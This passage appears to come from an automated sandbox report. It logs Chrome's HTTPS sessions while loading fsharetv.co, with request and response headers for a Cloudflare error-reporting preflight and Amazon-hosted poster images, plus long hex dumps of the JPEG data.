                                                                                                                                                                                          2024-12-15 11:38:07 UTC1378INData Raw: 27 44 2e d3 83 7d 7e cb b2 1c 67 f0 a5 f4 fe a8 7b aa 93 37 ce 38 79 a8 ff 00 98 de e8 d9 20 46 e0 aa 0a ba 12 e8 a4 d8 6f 75 65 ce 88 41 ae 8f 31 ea a1 de 1d ee ef 15 5c aa 46 32 50 8d ed b9 19 e4 d2 e5 c3 64 55 e0 1e 52 f3 46 0d 20 c6 32 ad bc fc 57 01 80 57 2b dc 6c 0a 5b 53 0f ee 32 0b b4 e0 df 53 e8 98 23 89 99 f8 4c ca 82 6e 49 c2 c8 e1 58 19 cf 47 8d e9 dd db 8e be eb e8 ab 3f d4 0c 27 2c 20 8c 4c 61 21 23 0b fd 51 30 35 70 fe dd c1 3b b8 44 09 e7 55 f5 44 ec fc ab 9a 7d 10 98 4e 3e aa 79 77 dd 63 5d fb 81 c9 ea 80 13 a7 7a 75 b3 62 3a 58 5f 0b 66 4d 39 54 a9 92 ed dc 57 69 c1 be bf 64 c9 e2 74 8f c0 ae 54 9b 8c 04 4d 82 25 32 1d 7c 10 e2 4c 3d 55 7d c4 a9 90 ea f8 8b 04 48 07 7b 5a 6a 7d d1 36 97 ae 26 a3 11 e2 b1 8f 55 30 6e 29 a1 a3 9f e5 6b 14
                                                                                                                                                                                          Data Ascii: 'D.}~g{78y FoueA1\F2PdURF 2WW+l[S2S#LnIXG?', La!#Q05p;DUD}N>ywc]zub:X_fM9TWidtTM%2|L=U}H{Zj}6&U0n)k
                                                                                                                                                                                          2024-12-15 11:38:07 UTC1378INData Raw: 4d 2d fd 38 7d be 0e 8f 8f c8 ea ba 3f cb f0 b6 75 92 a7 6e cf ea 67 d9 51 c0 8e 6b 0f 0b 31 e4 a7 0a ba c6 89 db 56 78 63 f3 5a ec 3d 26 b5 81 e0 ab 2e 04 48 f3 f3 b3 eb fe ff 00 cd 94 8c ed 97 5a 27 07 59 f4 98 fc d7 d4 3a ca ca 3d e6 1b eb d4 78 59 ac cf ed 57 8b 0e 93 6b e4 56 ae 12 25 3e fa 54 a1 31 52 4c 8e e5 de 0a f1 0e 7f 04 94 7e 47 b4 a8 12 13 52 ee cc ca 6d bd 41 bb 61 14 e2 f8 52 e1 d2 0b 0b 29 7a 74 06 cb d3 38 95 84 ec b8 78 fc dd f7 e0 9b 4b cc cd 9a 25 bd e8 5f b6 0b 8e 60 8a d1 96 ed 8a 9d 9b bf 91 1e 4b 1f 9b ff 00 8f cc 2b c1 42 ad a6 d0 9a d0 1c 08 bd c6 7c 91 27 ed 9b 50 84 23 75 76 58 7e 6b 5d ae 1e 7e 56 32 25 8f 88 dc f9 a0 06 e1 04 75 a3 fc a7 fe c5 aa e1 61 2d ff 00 11 95 12 ee a9 44 09 2d 66 7f 6f e7 e7 84 33 4e 9b 3a 8b 1d 20
                                                                                                                                                                                          Data Ascii: M-8}?ungQk1VxcZ=&.HZ'Y:=xYWkV%>T1RL~GRmAaR)zt8xK%_`K+B|'P#uvX~k]~V2%ua-D-fo3N:
                                                                                                                                                                                          2024-12-15 11:38:07 UTC1378INData Raw: 40 ce 5f 60 77 db e8 b2 50 77 91 2b c0 fa 71 f0 7c 5d 41 80 40 28 c4 9f 6f 52 5f 49 51 e8 d8 9e 6b d9 f5 86 83 d4 24 53 66 a0 18 04 df 15 fd 96 89 d2 14 5a 40 3f 3a c2 75 64 87 53 1a 83 e1 87 a8 78 ad 56 26 b5 1c 37 3d 65 fc 2c 1a 51 f8 71 37 37 c2 d0 42 c7 f8 b4 80 75 00 c7 e2 2a f5 33 28 42 3d a0 80 88 66 b4 6b 64 dd 78 8b ca 68 6c 24 84 32 d1 6e 4b 31 b8 78 c1 a9 5e 63 88 32 e5 81 00 aa b0 1d ba 40 d5 3d f2 a4 a3 b8 04 00 20 28 60 28 8c 10 41 89 19 46 84 df b9 9b d2 34 ab a0 cb ef dc 6d a4 31 88 0a d4 01 95 17 c9 70 01 bd 3a d8 64 f0 78 89 2c 05 1a ba 05 c8 38 c2 65 90 41 20 db 7d 00 60 89 c6 dc 79 91 7e 7d 04 9f 17 52 18 0e 22 08 9b c0 e8 07 01 c0 f8 c7 a3 58 19 11 3c ac 01 cf 58 3d 8d ad e7 22 78 79 98 67 1a 6c 00 d1 0c 92 b3 a0 96 19 af 78 73 d1 0c
                                                                                                                                                                                          Data Ascii: @_`wPw+q|]A@(oR_IQk$SfZ@?:udSxV&7=e,Qq77Bu*3(B=fkdxhl$2nK1x^c2@= (`(AF4m1p:dx,8eA }`y~}R"X<X="xyglxs


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                          70192.168.2.164980235.190.80.14436700C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-12-15 11:38:07 UTC528OUTOPTIONS /report/v4?s=J%2BfTEyXCZr2lOhfmsOa81sbl01xyWqPm8jMCnozW8rp8mR1Ziu3SpaLYBIwaI1U1ffkcFEYNBbZE1s5DZV2DNH4WAB7A6cAGI8hgDKuWnjUc4ut8Uw33%2F3ecXi7oXQ%3D%3D HTTP/1.1
                                                                                                                                                                                          Host: a.nel.cloudflare.com
                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                          Origin: https://fsharetv.co
                                                                                                                                                                                          Access-Control-Request-Method: POST
                                                                                                                                                                                          Access-Control-Request-Headers: content-type
                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                          2024-12-15 11:38:07 UTC336INHTTP/1.1 200 OK
                                                                                                                                                                                          Content-Length: 0
                                                                                                                                                                                          access-control-max-age: 86400
                                                                                                                                                                                          access-control-allow-methods: POST, OPTIONS
                                                                                                                                                                                          access-control-allow-origin: *
                                                                                                                                                                                          access-control-allow-headers: content-length, content-type
                                                                                                                                                                                          date: Sun, 15 Dec 2024 11:38:06 GMT
                                                                                                                                                                                          Via: 1.1 google
                                                                                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                          Connection: close


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                          71192.168.2.1649803151.101.193.164436700C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-12-15 11:38:07 UTC676OUTGET /images/M/MV5BMjM3OTJiYTktNjNjMS00Yjc3LWE3ODktZjIxMDk1NzU1ZTQ3XkEyXkFqcGdeQXVyODU4MzMxNDg@._V1_SX300.jpg HTTP/1.1
                                                                                                                                                                                          Host: m.media-amazon.com
                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                                                          Referer: https://fsharetv.co/
                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                          2024-12-15 11:38:07 UTC614INHTTP/1.1 200 OK
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Content-Length: 19997
                                                                                                                                                                                          Content-Type: image/jpeg
                                                                                                                                                                                          X-Amz-IR-Id: 546f78f7-a61e-4639-b3d8-38eddab67c56
                                                                                                                                                                                          Cache-Control: max-age=630720000,public
                                                                                                                                                                                          Last-Modified: Tue, 02 Jun 2020 23:24:57 GMT
                                                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                                                          Expires: Wed, 19 Oct 2044 13:21:19 GMT
                                                                                                                                                                                          X-Nginx-Cache-Status: HIT
                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                          Age: 916240
                                                                                                                                                                                          Date: Sun, 15 Dec 2024 11:38:07 GMT
                                                                                                                                                                                          X-Served-By: cache-iad-kjyo7100074-IAD, cache-nyc-kteb1890068-NYC
                                                                                                                                                                                          X-Cache: HIT from fastly, HIT from fastly
                                                                                                                                                                                          Server-Timing: provider;desc="fy"
                                                                                                                                                                                          alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                          2024-12-15 11:38:07 UTC1378INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 05 05 05 09 06 09 09 09 09 0c 13 0e 0e 0c 0e 0e 19 12 0e 12 10 17 0e 10 10 17 10 17 17 10 14 17 14 14 1a 17 13 13 17 1a 14 17 18 23 18 1c 19 1f 1a 18 21 18 23 18 23 22 22 24 27 28 23 17 27 35 01 09 09 05 09 09 09 0c 09 09 13 21 17 0e 1a 22 1c 0c 18 29 22 28 1a 22 24 22 22 19 2c 22 28 21 22 14 23 22 1a 1f 1f 1a 1a 1c 18 1c 22 1a 24 24 23 0e 19 24 21 17 2f 19 1a 17 22 21 27 1f 17 24 2a ff c2 00 11 08 01 87 01 2c 03 01 22 00 02 11 01 03 11 01 ff c4 00 35 00 00 01 04 03 01 01 00 00 00 00 00 00 00 00 00 00 00 01 06 07 08 03 04 05 02 09 01 01 00 03 01 01 01 00 00 00 00 00 00 00 00 00 00 00 01 02 03 04 05 06 ff da 00 0c 03 01 00 02 10 03 10 00 00 00 7e 75 99 6e 3a b0 ed f3 7c 27 a8 f4 8d
                                                                                                                                                                                          Data Ascii: JFIF#!##""$'(#'5!")"("$"","(!"#""$$#$!/"!'$*,"5~un:|'
                                                                                                                                                                                          2024-12-15 11:38:07 UTC1378INData Raw: 1d 3d f8 0d 1e 2e f6 db 8b 6e 4d cf 7c dd ad f0 d8 03 58 54 04 1c 6e c8 96 9e 8e eb 2f cf ee ed f6 23 47 0d 2e c3 94 60 69 a6 6f 5b ea 75 95 ad fd dc 78 d1 4d f9 80 00 01 ef 73 a8 8a 52 ff 00 59 3a f1 4c ad 15 d1 4f 67 35 f4 f7 71 22 63 26 a4 e3 07 e5 d2 e5 a9 56 52 a2 5e f2 cd c3 d6 df 73 ee 1a aa a7 9c 1e 35 73 d1 e2 ba 1c 7e ee 77 33 52 80 43 0b 7d 51 75 7c 83 b7 34 9b 41 c6 c5 b9 c5 db cd ae 73 1b 6a 74 85 5c 3b 06 d9 d5 91 53 bb cd 00 00 00 00 00 fa 19 61 7e 5a 7d 0b ca cf 64 3c e1 29 e3 63 1c 4e 18 66 67 26 6b 53 9d e9 9b 3d df 5e 3d f8 b7 3f 8d 1d ce 55 34 f3 83 17 9c f6 d9 a4 b6 5f e7 b7 4d 39 40 76 72 19 31 74 4b 9d 3a 50 f7 a7 07 6d b9 e4 63 e9 f3 ec c0 66 39 28 8f 45 35 bc 87 7f 9e 00 00 00 00 00 00 7d 88 c7 9b cf 25 fc f9 c7 ee 93 eb 81 df 86
                                                                                                                                                                                          Data Ascii: =.nM|XTn/#G.`io[uxMsRY:LOg5q"c&VR^s5s~w3RC}Qu|4Asjt\;Sa~Z}d<)cNfg&kS=^=?U4_M9@vr1tK:Pmcf9(E5}%
                                                                                                                                                                                          2024-12-15 11:38:07 UTC1378INData Raw: cc e9 9b 84 e5 4b bb a4 74 17 2c 8d 15 e4 6a 28 94 e9 4d 79 91 d8 d4 e8 0d 4e 04 0e 7c be 87 22 a3 59 b6 84 82 1c 96 69 ed 8c 9a 0f bc 3d 53 d1 dc 4b 77 4b 2f 83 ed 3b a7 16 74 6e 80 49 8e 8f 68 9a b3 12 a5 2e 61 f1 5d cd 28 ab 0f 53 34 8b 04 e5 7c de bf c4 1f 6a b1 97 4a b5 44 71 ad a6 1d b1 86 3b 53 a8 15 0c 44 03 cc 47 35 ff 00 dc 5e 2f ed 1c a3 fc e9 cd 4f f8 ed cd 21 f0 84 bc e5 1d e3 52 92 cd 43 4d 1a cb e7 9b ff 00 b7 66 85 fb 25 9f 10 7d eb c4 7e da f2 9f f3 71 fa 93 ac 33 a5 5d da 63 48 08 9b a1 7f cd 9a 1f ef ce 6a df c6 66 68 3f 63 3d 5d bb 75 7a a7 60 43 81 e9 a4 ea cb 09 4c 5f 44 70 17 e9 16 0f e6 90 8f 96 37 d5 a8 b2 c1 8c 80 46 c3 19 5a 8b 42 d7 52 6f 2e 5a 96 08 e9 fa 79 c2 9c b6 ad 16 e9 14 f0 b1 52 dd a1 e6 63 4d 9d c8 97 9a 4a 0d 2a 98
                                                                                                                                                                                          Data Ascii: Kt,j(MyN|"Yi=SKwK/;tnIh.a](S4|jJDq;SDG5^/O!RCMf%}~q3]cHjfh?c=]uz`CL_Dp7FZBRo.ZyRcMJ*
                                                                                                                                                                                          2024-12-15 11:38:07 UTC1378INData Raw: 43 5d 7f 59 d3 9a 4e 8d b6 cc 68 84 0e 48 c4 fb b9 1d 2f 30 b1 76 07 34 ab 1d 74 0c e4 ce d9 25 be 6b 09 86 61 87 09 db 3c b2 17 84 3c 36 db 4b d7 c9 73 c5 d1 3b f9 c7 87 e2 94 4f d2 66 6d e0 d0 2b f1 19 3c 75 de 1f 6d 7d 59 cf 29 88 e9 93 76 1f 46 ba 7b d5 a9 c1 f0 6b f4 e7 f7 07 e1 fb fd 07 70 23 74 cb 64 31 ce e3 be 6a 1a 89 3e 76 ec 89 c1 68 70 91 99 6e fb e2 82 0c 76 cf 86 ef 6f ca b9 f8 75 4a ac 78 fc 8d 81 e5 b6 40 ef ed dd a7 87 3c ab a7 72 21 8c ab 56 10 3c 73 a7 b6 0a 60 70 7d 02 f2 89 cd 0a 37 36 96 77 a1 9d e2 10 e8 6e 5b 7f 47 6d e3 53 12 91 80 7a e1 80 43 34 b4 03 39 e6 c6 3c fa e5 97 9f 12 a2 29 9e c8 2e c9 8c 59 f0 9c 55 89 41 8b 06 a5 88 b2 b0 64 78 2c b6 14 05 39 61 b2 e3 23 2a ce 94 b0 4e 2a a0 64 79 4a d2 21 ed d8 45 b6 29 dc e6 60 7d
                                                                                                                                                                                          Data Ascii: C]YNhH/0v4t%ka<<6Ks;Ofm+<um}Y)vF{kp#td1j>vhpnvouJx@<r!V<s`p}76wn[GmSzC49<).YUAdx,9a#*N*dyJ!E)`}
                                                                                                                                                                                          2024-12-15 11:38:08 UTC1378INData Raw: 1b cb 4f 96 32 76 ce 1b ce 6f bb 1b 9a 83 63 8c 46 11 6f e1 d3 68 4f c8 dc 01 f2 f3 e5 be fb 5c a8 37 42 42 58 b9 51 10 17 af b4 76 3a 3c a7 1f 5e 0a 37 ca 74 9a f8 e9 e7 b6 6f b6 59 77 39 c9 c7 e2 a3 79 8c 9b 1c 39 e1 9c 9c ef 3e 1d 1f 53 85 4c 03 06 da e6 39 41 dd 11 8d e1 d6 3a 52 05 3a f4 2b 8e fe 82 2b cb b7 d9 74 c4 8f 84 dd d3 0a b4 41 e6 9b 44 6c f2 e5 e0 88 21 ce a6 19 f0 c8 54 14 f2 8d b6 ec b2 df f1 83 9e cb 31 81 e5 33 93 3b fa 02 d2 0d f6 4d b3 54 48 e2 ef 11 8f 44 ed db 37 ec 25 e3 d3 6a a1 ca f3 25 54 38 e1 84 50 98 38 3b 16 39 b0 8d 7e 09 ff 00 e6 2b 79 9f 28 98 8f 2e c6 b3 84 64 ce f9 23 cf 25 39 67 cb 2c 1f 4d 53 f8 95 5a 1b 74 d9 59 70 33 e7 0f e9 f9 c6 b6 09 83 12 5f 82 4a 63 1a 5e 5b ce 87 74 ac cb b3 54 b5 d3 12 8c a5 f1 13 55 b4 36
                                                                                                                                                                                          Data Ascii: O2vocFohO\7BBXQv:<^7toYw9y9>SL9A:R:++tADl!T13;MTHD7%j%T8P8;9~+y(.d#%9g,MSZtYp3_Jc^[tTU6
                                                                                                                                                                                          2024-12-15 11:38:08 UTC1378INData Raw: b8 ca ea 2e b6 af 68 3e cb 26 06 c1 96 23 3c cc d7 69 17 fd fb 2c 2c a2 99 2e 4c 91 68 b7 73 a0 92 27 85 e3 72 8e be 9d be 62 40 16 77 0a 64 c4 76 93 c8 39 91 df e8 6d 6a 63 28 fa 25 e4 68 64 76 b4 df 04 02 33 a5 5d 08 cc a7 e9 d2 ff 00 5b c1 52 5b 08 45 aa cb ad 01 ef da b5 68 ae da e6 26 8a 71 bd af 91 12 09 23 d1 a6 2f 77 04 b3 5e d9 a4 76 7c af 77 3a ad b1 c2 69 95 63 79 34 b7 f7 29 27 d2 97 12 47 9e 5a ea f7 69 1f 29 64 b9 92 56 df 2d d7 a8 e5 79 b7 da c7 a8 4f 14 86 64 93 55 ba 99 59 65 3a 9d c9 55 4a 6d 76 f5 88 25 75 09 d7 66 d4 bc 96 37 32 27 f5 62 b9 6d fc 2a b9 34 64 ed b5 55 ca 9c 82 f9 f2 50 8e ae e3 e9 23 6a e3 82 40 5f c1 88 63 0c ca 57 c7 15 42 cc 14 24 71 2a f6 60 24 4e f2 40 63 38 e1 ed c8 c6 e3 6a c3 c3 46 cb d9 b8 b8 24 06 e1 06 4b 51
                                                                                                                                                                                          Data Ascii: .h>&#<i,,.Lhs'rb@wdv9mjc(%hdv3][R[Eh&q#/w^v|w:icy4)'GZi)dV-yOdUYe:UJmv%uf72'bm*4dUP#j@_cWB$q*`$N@c8jF$KQ
                                                                                                                                                                                          2024-12-15 11:38:08 UTC1378INData Raw: 29 e7 87 8a 69 e4 39 7a 0b a7 0b a7 2c 62 f2 c2 e1 8f 44 36 58 e6 5f 10 7b 25 6f 7f 22 e5 0e 13 b5 ec 81 9b 5f e2 07 ff 00 28 4b 63 f0 8d 39 60 6a 3c 96 4f 7f cf a7 60 3a 01 89 95 98 0a d0 27 03 a0 a7 01 e2 51 94 f1 3e 3a 1c 02 70 3e 7a 4e a1 d2 7a 0f c4 b1 2d 6f 72 c7 c7 04 ec 23 fe b4 76 53 f6 c8 46 2f 50 a7 4c 62 ab 73 05 44 73 58 ff 00 ca 74 32 51 f0 29 d8 e0 d5 81 9a 77 85 21 9c 72 4f dd f2 46 6e a7 54 a3 3f 35 8b 4f 40 e2 56 2e 1e 8a d0 d7 cd 70 5c 02 ec ae 0b b4 f5 c1 64 9f 00 27 12 65 71 fa ae d2 ec 95 d9 0b b4 f5 ea ad 66 06 0b 80 5d 92 bb 97 1e 80 26 0a a3 98 9b 4f 24 6f 13 8f 72 e0 10 9a 2e 08 6c cb ab e2 b1 21 08 be 84 fb 82 b2 ea 26 ed 4e 08 46 d2 6c d1 64 02 6d 25 d5 4d 91 96 69 97 47 a4 a6 c4 84 d2 28 84 93 08 45 7a 53 c4 a3 4e 29 d4 13 1e
                                                                                                                                                                                          Data Ascii: )i9z,bD6X_{%o"_(Kc9`j<O`:'Q>:p>zNz-or#vSF/PLbsDsXt2Q)w!rOFnT?5O@V.p\d'eqf]&O$or.l!&NFldm%MiG(EzSN)
                                                                                                                                                                                          2024-12-15 11:38:08 UTC1378INData Raw: b3 d3 9f 4e fc bb 3f f7 3b fe 34 e0 16 4b 21 a3 82 f0 1d 21 c0 04 02 68 85 45 68 72 af 04 f8 e2 b0 6e 8c 74 f7 68 cf 59 b4 f7 4d 42 3a 13 53 4a fb 2a 0c fb 90 da 7c 4f 95 35 b8 eb d7 bb 46 4b c8 f0 58 83 d0 e6 6f 60 a8 2f 9b dd fd da 70 d1 9e 8c 64 eb e1 c5 1a 2c 16 07 f6 13 76 9d 81 fb f3 19 23 0a ad 5e 9a f5 1a f9 ac b9 93 12 b0 39 23 b2 73 e0 8c 86 61 cc 3e eb a5 3e f1 1c 31 42 f3 63 c6 50 b8 0e 43 5f 0e 63 ad d1 3d 78 21 3f 12 a8 54 bd 88 d7 e3 a3 6c 7b eb 75 7a 29 54 f0 a6 b7 ff c4 00 29 10 01 00 02 01 03 02 05 04 03 01 00 00 00 00 00 00 01 00 11 21 31 41 51 61 71 10 20 81 91 a1 30 40 b1 f0 c1 d1 f1 e1 ff da 00 08 01 01 00 01 3f 21 b5 85 a4 43 23 eb 62 ef c4 25 de e8 7b 33 4c 2e 36 b0 1f 4d cc 0e 6c 65 28 d5 a7 46 a7 d4 a8 a5 a8 2d 89 bf a7 7d e2 e3
                                                                                                                                                                                          Data Ascii: N?;4K!!hEhrnthYMB:SJ*|O5FKXo`/pd,v#^9#sa>>1BcPC_c=x!?Tl{uz)T)!1AQaq 0@?!C#b%{3L.6Mle(F-}
                                                                                                                                                                                          2024-12-15 11:38:08 UTC1378INData Raw: 5e 21 b0 57 46 6d cc a1 0e 4d 6f aa 22 2d 0b b7 0a a8 fd 75 8c 41 b3 6f b6 ee cc bd dd 55 85 25 c7 01 81 6d ae 01 b0 ba 87 7e 26 74 f6 4b ed e4 63 0f a2 ef 38 f2 63 bf 5a 61 fa 4f 70 7b 35 8f de cb 18 1f a4 7d 89 fe 5e 03 34 b6 4e 6b 68 fc 38 63 1a 76 8f 5d 8b f2 f0 4f 88 fc c1 54 14 d7 3b 4b 44 3d 83 17 53 43 da 2d 00 63 e2 65 f7 be 53 eb a4 d9 d2 cd 33 cf 4b 8b dd cc 3b cf c1 1e 72 ea dc d5 ec 41 d3 63 74 5e de 47 c0 7d 16 d2 9e 43 4b f7 c4 7b 4d 1e 81 a1 da 31 a0 b5 14 be ce 67 ec f5 3c 02 ee f0 f6 7f a8 fc e0 60 36 bd 22 eb 6d bb cb b4 a6 0b c5 b1 42 aa ea ba 35 57 c1 4a 9e 8c ae 99 b9 70 4c a4 d1 ad a0 91 8b a1 b1 e3 a5 43 7c 75 9a 29 3e 6f f3 0f b1 fc 78 53 4b ca 20 3e a5 d4 63 d4 c6 b8 e3 49 91 3e e9 df 69 9f dd 34 f8 6f 12 e4 23 85 b3 3e 0d ac 06
                                                                                                                                                                                          Data Ascii: ^!WFmMo"-uAoU%m~&tKc8cZaOp{5}^4Nkh8cv]OT;KD=SC-ceS3K;rAct^G}CK{M1g<`6"mB5WJpLC|u)>oxSK >cI>i4o#>
                                                                                                                                                                                          2024-12-15 11:38:08 UTC1378INData Raw: be 20 e8 e2 7c 58 74 47 59 a1 ae 8e cf a3 1b 86 56 de dd 5d 17 23 05 8d e5 11 08 cf d1 71 9f bc 4a 0c af 1f f4 98 e1 ed 0f 07 b2 f3 9a 60 ed 1f 76 12 fa ac 9b 5b f9 96 65 2f e2 00 07 4a 4e 25 d5 b4 7d 2f 5a 1b 9d 51 8a 4e 7c fb 21 93 df 11 89 ef 98 e1 71 96 f5 0d 55 e0 90 83 d8 78 1d d5 56 1f 40 35 ee 4a 76 af fa 4e a7 c9 14 0b 37 75 db a4 c9 45 53 9c 65 65 1d 51 9a 7c 0d 13 19 e7 58 78 b9 42 f6 4f 6b 1b 71 19 a1 62 6f 00 01 af bc e3 1d f4 89 96 88 fd 84 9a 35 0d 60 8f 50 ff 00 1f 4e b3 85 f7 dd e4 4d 23 83 ac 3d 45 e8 39 9a 9f 3d cd 4e e0 42 98 d7 37 5a 3b 9e 86 61 a3 c0 3a 10 4e c0 a2 65 0d ae 55 32 61 34 4a d6 3d 74 1b 6e bc 11 41 d0 ff 00 cb 16 fc 0a dd f5 87 65 de 03 42 c8 47 f6 88 f9 98 62 06 b6 63 8d 74 d6 12 b0 fd 25 79 4b 51 37 3f e4 03 56 f2 db
                                                                                                                                                                                          Data Ascii: |XtGYV]#qJ`v[e/JN%}/ZQN|!qUxV@5JvN7uESeeQ|XxBOkqbo5`PNM#=E9=NB7Z;a:NeU2a4J=tnAeBGbct%yKQ7?V


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                          72192.168.2.1649804151.101.65.164436700C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-12-15 11:38:07 UTC445OUTGET /images/M/MV5BNWYxZjE3MGQtZWZmMC00NTFjLTlkZmUtODFkZDY1MGYyZWQ4XkEyXkFqcGdeQXVyNjM2NTM3ODA@._V1_SX300.jpg HTTP/1.1
                                                                                                                                                                                          Host: m.media-amazon.com
                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                          2024-12-15 11:38:07 UTC616INHTTP/1.1 200 OK
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Content-Length: 50325
                                                                                                                                                                                          Content-Type: image/jpeg
                                                                                                                                                                                          X-Amz-IR-Id: 9d8fc078-266a-4a7c-becc-e8699c6a66e1
                                                                                                                                                                                          Cache-Control: max-age=630720000,public
                                                                                                                                                                                          Last-Modified: Mon, 25 Apr 2016 20:20:45 GMT
                                                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                                                          Expires: Fri, 04 Nov 2044 04:41:56 GMT
                                                                                                                                                                                          X-Nginx-Cache-Status: MISS
                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                          Date: Sun, 15 Dec 2024 11:38:07 GMT
                                                                                                                                                                                          Age: 2783632
                                                                                                                                                                                          X-Served-By: cache-iad-kcgs7200111-IAD, cache-nyc-kteb1890065-NYC
                                                                                                                                                                                          X-Cache: HIT from fastly, HIT from fastly
                                                                                                                                                                                          Server-Timing: provider;desc="fy"
                                                                                                                                                                                          alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                          2024-12-15 11:38:07 UTC1378INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 05 05 05 09 06 09 09 09 09 0c 13 0e 0e 0c 0e 0e 19 12 0e 12 10 17 0e 10 10 17 10 17 17 10 14 17 14 14 1a 17 13 13 17 1a 14 17 18 23 18 1c 19 1f 1a 18 21 18 23 18 23 22 22 24 27 28 23 17 27 35 01 09 09 05 09 09 09 0c 09 09 13 21 17 0e 1a 22 1c 0c 18 29 22 28 1a 22 24 22 22 19 2c 22 28 21 22 14 23 22 1a 1f 1f 1a 1a 1c 18 1c 22 1a 24 24 23 0e 19 24 21 17 2f 19 1a 17 22 21 27 1f 17 24 2a ff c2 00 11 08 01 a5 01 2c 03 01 22 00 02 11 01 03 11 01 ff c4 00 35 00 00 01 05 01 01 01 01 00 00 00 00 00 00 00 00 00 06 03 04 05 07 08 02 00 01 09 01 00 02 03 01 01 00 00 00 00 00 00 00 00 00 00 00 01 02 00 03 04 05 06 ff da 00 0c 03 01 00 02 10 03 10 00 00 00 c9 5c 2d c0 1c f3 d7 a4 f9 f7 ef c9 3d
                                                                                                                                                                                          Data Ascii: JFIF#!##""$'(#'5!")"("$"","(!"#""$$#$!/"!'$*,"5\-=
                                                                                                                                                                                          2024-12-15 11:38:07 UTC1378INData Raw: 71 74 42 70 44 44 e0 64 74 e8 43 b7 9a b9 3d ae e5 12 e7 f1 91 66 ec f2 a5 2c e4 5a b1 ab 22 2f e0 49 9e 13 f0 8b 20 93 f1 1d 3a f9 d4 14 e8 36 a0 e5 96 af b0 dc f2 19 37 3e c8 e2 71 50 b8 59 a9 1f b3 57 1c 22 da 42 04 5a 0d 20 61 5b 58 77 56 fe 50 66 6a 3c b7 5e ef 2e af ce ad 97 87 f5 6f 13 41 46 7e bc 3d 26 4d 94 db 39 5b bf 8d d7 a9 37 32 dd 08 f2 b7 e0 5d a3 4d f2 7d 97 51 bd a2 78 23 7c f1 ca a0 94 2e 5f aa b4 09 77 f2 a4 8b 0b 0d 97 99 91 fa 78 af e7 ed f1 09 7e 1b be 68 18 aa 38 67 e2 2d 83 ca 2c de 28 84 54 e1 8c 91 b7 4d 6a ed 93 46 cc 44 2f ae 92 fe a2 23 b0 ee fc fe d9 74 1d cb c3 d2 6e 42 21 e7 07 79 d6 d4 a2 3b d8 eb 1a f4 dc 39 59 09 66 1e 06 46 4c 5f d0 df c6 59 84 dd 1e e2 af 26 99 15 af b4 f5 66 68 05 a0 4d d4 f1 98 86 9b fd 1b c0 44 75
                                                                                                                                                                                          Data Ascii: qtBpDDdtC=f,Z"/I :67>qPYW"BZ a[XwVPfj<^.oAF~=&M9[72]M}Qx#|._wx~h8g-,(TMjFD/#tnB!y;9YfFL_Y&fhMDu
